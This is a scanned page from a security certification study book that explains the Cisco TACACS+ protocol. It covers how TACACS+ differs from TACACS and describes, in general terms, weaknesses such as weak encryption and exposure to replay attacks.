Page 137 - StudyBook.pdf
P. 137

Communication Security: Remote Access and Messaging • Chapter 3  121

                 TACACS+

                 Cisco decided to develop a proprietary version of TACACS known as TACACS+.
                    The driving factor behind TACACS+ was to offer networking professionals the
                 ability to manage all remote access components from a centralized location.
                 TACACS+ is also credited with separating the AAA functions.TACACS+ is con-
                 sidered proprietary because its packet formats are completely different from those
                 in TACACS or XTACACS, making TACACS+ incompatible with previous ver-
                 sions. Unlike previous versions of TACACS that used one database for all AAA,
                 TACACS+ uses individual databases for each.TACACS+ was the first revision to
                 offer secure communications between the TACACS+ client and the TACACS+
                 server. Like XTACACS,TACACS+ uses TCP as its transport.TACACS+ continues
                 to gain popularity because it is easy to implement and reasonably priced.



                 EXAM WARNING

                      Make sure you understand the difference between TACACS and
                      TACACS+. The most important thing to remember is that TACACS uses
                      UDP as its transport protocol while TACACS+ uses TCP. Also, TACACS+ is
                      a proprietary version owned by Cisco.






                 Vulnerabilities
                 The largest vulnerability in TACACS+ is the comparative weakness of the encryp-
                 tion mechanism. It’s possible for someone with physical network access to capture
                 an authentication request from a client and manipulate it.This request would be
                 accepted by the server; the encrypted reply would be sent but because the cleartext
                 of that reply would be known, breaking the encryption would be a fairly simple
                 task. Even worse, the encryption used in TACACS+ is based on a shared secret that
                 is rarely changed, so a compromise at any point would ultimately expose future
                 compromises. It is, therefore, a very good idea to regularly change the shared secrets
                 used by TACACS+ clients.
                    One of the biggest complaints regarding TACACS+ is that it does not offer
                 protection against replay attacks. Replay attacks occur when a hacker intercepts an
                 encrypted packet and impersonates the client using the information obtained from
                 the decrypted packet.When files are sent over a network using Transmission
                 Control Protocol/Internet Protocol (TCP/IP), they are split into segments suitable



                                                                              www.syngress.com
   132   133   134   135   136   137   138   139   140   141   142